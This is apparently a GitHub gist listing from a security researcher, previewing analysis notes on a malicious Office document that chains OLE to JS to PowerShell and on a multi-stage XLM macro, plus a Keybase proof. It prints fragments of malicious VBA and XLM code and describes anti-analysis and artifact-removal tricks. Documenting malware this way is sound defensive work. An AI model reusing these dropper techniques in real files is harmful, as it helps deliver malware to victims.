Jan Miller miller-itsec
miller-itsec / copy-ole-maldoc.md
Created April 18, 2022 20:59
Copy OLE -> JS -> Powershell

3acc0848c4fa44af2f91688375bc200a40a36b7d2c567166f59625f69bb65751 from #579

  • Copy an OLE object and paste it into a Scripting.FolderItem; this yields a .txt file, which is then renamed to .js.
    For Each Sh In Sheet1.OLEObjects
        If InStr(1, Sh.Name, "Object", 1) Then
            Sh.Copy
            ' this code paste Embedded Object to folder
            Set KjCQxE = GetObject("new:13709620-C279-11CE-A49E-444553540000") ' Scripting.Shell
miller-itsec / multi-stage-xlm.md
Created February 4, 2022 14:50
Multi-Stage XLM

This multi-stage XLM downloads the second-stage payload only if an internet connection is present. It contains anti-analysis tricks, such as checking the real sleep length, and removes second-stage origin artifacts, such as the zone identifier.

SHA-256: 5f2adacaf4ecb00ed24dd9dfe355307d0d6e786e40c945ad4c6d1ae3a4835d2a

Report: https://www.filescan.io/uploads/61fd39b19046890c53adaa11/reports/f0412948-2f44-4ad2-ad51-31d347e9dd56/overview

  • Stage 1: the entry-point stage; FORMULA(crack) is the key cell for creating the next stage.
C51	pound=(VALUE("0"))
C52	=WHILE(pound<30)

Keybase proof

I hereby claim:

  • I am miller-itsec on github.
  • I am miller_itsec (https://keybase.io/miller_itsec) on keybase.
  • I have a public key whose fingerprint is 1702 4CDA 716B 5502 0CAB B288 5809 4FF4 6B0A BE22

To claim this, I am signing this object: